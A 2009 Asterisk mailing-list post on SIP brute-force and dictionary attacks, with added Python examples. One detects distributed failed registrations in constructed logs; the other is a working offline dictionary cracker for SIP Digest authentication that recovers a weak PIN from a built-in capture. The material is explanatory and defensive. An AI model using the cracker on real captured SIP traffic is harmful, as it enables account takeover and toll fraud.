[asterisk-biz] PBX got Hacked

Trixter aka Bret McDanel trixter at 0xdecafbad.com
Tue Mar 10 02:48:41 CDT 2009


On Tue, 2009-03-10 at 05:40 +0000, Vikram Rangnekar wrote:
> The main reasons for all this brute force hacking of Asterisk (a new
> phenomenon) is the proliferation of Asterisk (obviously) and configurations
> where the extension is the same as the authentication credentials for the
> phones (My extension is 100 my pin is 1234 and I use this for my voicemail as
> well as for authenticating my phone with the server)
> 
> Ok well it's possible your pin is 3214, even that does not really matter to a
> brute force attack over SIP where there is no real forced delay between retry
> attempts. 
> 

Brute force attacks should generate logs of the failed attempts.  Those
logs should be read by a human who can take appropriate measures to deal
with it.  Automated responses such as blocking an IP are fine and all,
however there still has to be a human behind it all looking at those
logs.  Automated responses can be used to DoS the real person with
clever packets and spoofed IPs; they can also not be tripped because the
person did it slower and from more hosts and such, making it just under
whatever threshold is coded into the automated response.

If you have a human reading the logs, the attacker has a much harder
time brute forcing the credentials and abusing a system.  Unless they
get packet captures and are trying to do a dictionary attack (slightly
different than a brute force, which is probably what you meant in the
first place) on the hashes that are contained in the auth packets.
Randomly chosen passwords make dictionary attacks impossible, the length
of the password can make brute force attacks unreasonable, and the
hashes should be sufficient that rainbow tables and reversing are
impossible/impractical (SIP has this going for it at least).


-- 
Trixter http://www.0xdecafbad.com     Bret McDanel
pgp key: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x8AE5C721
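The threshold-evasion point above (a per-IP block rule misses an attacker who spreads attempts across hosts and time, but a human reading the logs still sees every failure against one extension) is easy to show on log data. The script below is an added example written for this page, not code from the post or from Asterisk; the log lines are constructed in the style of Asterisk 1.4/1.6 `chan_sip` "Registration from ... failed for ..." notices, with invented addresses, extensions and times. It applies a fail2ban-style per-IP sliding-window rule, then a per-extension view of the kind a human reviewer would use, and shows that the second catches a slow, distributed attempt the first does not.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not a real capture). 203.0.113.5 hammers extension
# 100 eight times in 28 seconds; four hosts in 198.51.100.0/24 each try
# extension 101 twice, two minutes apart; 192.0.2.50 is one user typo.
SAMPLE_LOG = """\
[Mar 10 02:40:01] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:03] VERBOSE[2231] logger.c:     -- Registered SIP '102' at 192.0.2.50 port 5060
[Mar 10 02:40:05] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:09] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:13] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:17] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:21] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:25] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:40:29] NOTICE[2231] chan_sip.c: Registration from '"100" <sip:100@192.0.2.1>' failed for '203.0.113.5' - Wrong password
[Mar 10 02:41:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.10' - Wrong password
[Mar 10 02:43:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.10' - Wrong password
[Mar 10 02:45:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.11' - Wrong password
[Mar 10 02:47:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.11' - Wrong password
[Mar 10 02:49:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.12' - Wrong password
[Mar 10 02:51:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.12' - Wrong password
[Mar 10 02:53:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.13' - Wrong password
[Mar 10 02:55:10] NOTICE[2231] chan_sip.c: Registration from '"101" <sip:101@192.0.2.1>' failed for '198.51.100.13' - Wrong password
[Mar 10 02:56:02] NOTICE[2231] chan_sip.c: Registration from '"102" <sip:102@192.0.2.1>' failed for '192.0.2.50' - Wrong password
"""

# Matches only the chan_sip failed-registration notice; everything else is ignored.
FAIL_RE = re.compile(
    r"^\[(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d)\] NOTICE\[\d+\] chan_sip\.c: "
    r"Registration from '(?P<from>[^']*)' failed for '(?P<ip>[0-9.]+)' - (?P<reason>.+)$"
)
EXT_RE = re.compile(r"sip:([^@>]+)@")


def parse_failures(log_text, year=2009):
    """Return a list of (timestamp, extension, source_ip, reason) tuples.

    Asterisk's default log timestamp carries no year, so the caller supplies it.
    """
    events = []
    for line in log_text.splitlines():
        m = FAIL_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
        ext_m = EXT_RE.search(m.group("from"))
        ext = ext_m.group(1) if ext_m else m.group("from")
        events.append((ts, ext, m.group("ip"), m.group("reason")))
    return events


def per_ip_alerts(events, threshold=5, window_s=60):
    """Automated-block rule: IPs with >= threshold failures inside any window_s span."""
    by_ip = defaultdict(list)
    for ts, _ext, ip, _reason in events:
        by_ip[ip].append(ts)
    alerts = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):          # two-pointer sliding window
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                alerts.add(ip)
                break
    return alerts


def per_extension_summary(events):
    """Human-review view: {extension: (total failures, distinct source IPs)}."""
    counts = defaultdict(int)
    sources = defaultdict(set)
    for _ts, ext, ip, _reason in events:
        counts[ext] += 1
        sources[ext].add(ip)
    return {ext: (counts[ext], len(sources[ext])) for ext in counts}


def needs_human_review(events, min_failures=5, min_sources=3):
    """Extensions a person should look at, regardless of whether any single IP tripped the block rule."""
    summary = per_extension_summary(events)
    return sorted(ext for ext, (n, srcs) in summary.items()
                  if n >= min_failures or srcs >= min_sources)


if __name__ == "__main__":
    ev = parse_failures(SAMPLE_LOG)
    print("auto-blocked IPs:", sorted(per_ip_alerts(ev)))
    for ext, (n, srcs) in sorted(per_extension_summary(ev).items()):
        print(f"ext {ext}: {n} failures from {srcs} source(s)")
    print("needs a human:", needs_human_review(ev))
```

With the sample data the per-IP rule blocks only 203.0.113.5; none of the 198.51.100.x hosts ever reaches five failures in a minute, so they are never blocked, yet extension 101 shows eight failures from four sources and lands in the review list. A second caveat from the post also applies to the block rule: because UDP SIP packets can carry a spoofed source, anything that blocks on source IP alone can be turned against a legitimate remote phone.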

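The post's second scenario, a dictionary attack on the hash carried in the auth packets, is also straightforward to demonstrate. SIP uses HTTP Digest (RFC 2617 as adopted by RFC 3261); without `qop` the client sends `response = MD5(MD5(user:realm:password):nonce:MD5(method:uri))`, so anyone who captured one REGISTER exchange can test candidate passwords offline at MD5 speed. The script below is an added example for this page, not code from the post or from Asterisk. The `Authorization` header it attacks is constructed in place with `build_capture` (standing in for a packet capture), and the realm, nonce, URI and wordlist are invented; the point it shows is the one the post makes, that a PIN-style secret falls to a small wordlist while a random one does not.

```python
import hashlib
import re


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 Digest response without qop, the form chan_sip used at the time."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def build_capture(password, username="100", realm="asterisk",
                  nonce="3f0a1b2c9d8e", uri="sip:192.0.2.1", method="REGISTER"):
    """Construct the Authorization header a phone would send (stands in for a sniffed packet)."""
    resp = digest_response(username, realm, password, method, uri, nonce)
    return (f'Digest username="{username}", realm="{realm}", nonce="{nonce}", '
            f'uri="{uri}", response="{resp}", algorithm=MD5')


def parse_digest_header(header):
    """Split 'Digest k="v", k=v, ...' into a dict; quotes are optional per the grammar."""
    _scheme, body = header.split(" ", 1)
    return dict(re.findall(r'(\w+)="?([^",]*)"?', body))


def crack_digest(header, method, wordlist):
    """Offline dictionary attack: recompute the response for each candidate and compare."""
    f = parse_digest_header(header)
    for cand in wordlist:
        if digest_response(f["username"], f["realm"], cand,
                           method, f["uri"], f["nonce"]) == f["response"]:
            return cand
    return None


# Invented wordlist; note the extension number itself is a common choice.
WORDLIST = ["password", "0000", "1111", "100", "123456", "1234", "4321"]

if __name__ == "__main__":
    weak = build_capture("1234")
    strong = build_capture("r7Kq2mVx9LpZ")
    print("weak PIN  ->", crack_digest(weak, "REGISTER", WORDLIST))
    print("random pw ->", crack_digest(strong, "REGISTER", WORDLIST))
```

The nonce prevents replay of a captured response against the server but does nothing against this offline check, because the attacker knows the nonce too; only the secret's entropy limits the search. The same loop extended to every string of a given length is the brute force the post distinguishes from a dictionary attack, and its cost grows with the alphabet raised to the password length, which is why length rather than hash strength is what makes it unreasonable.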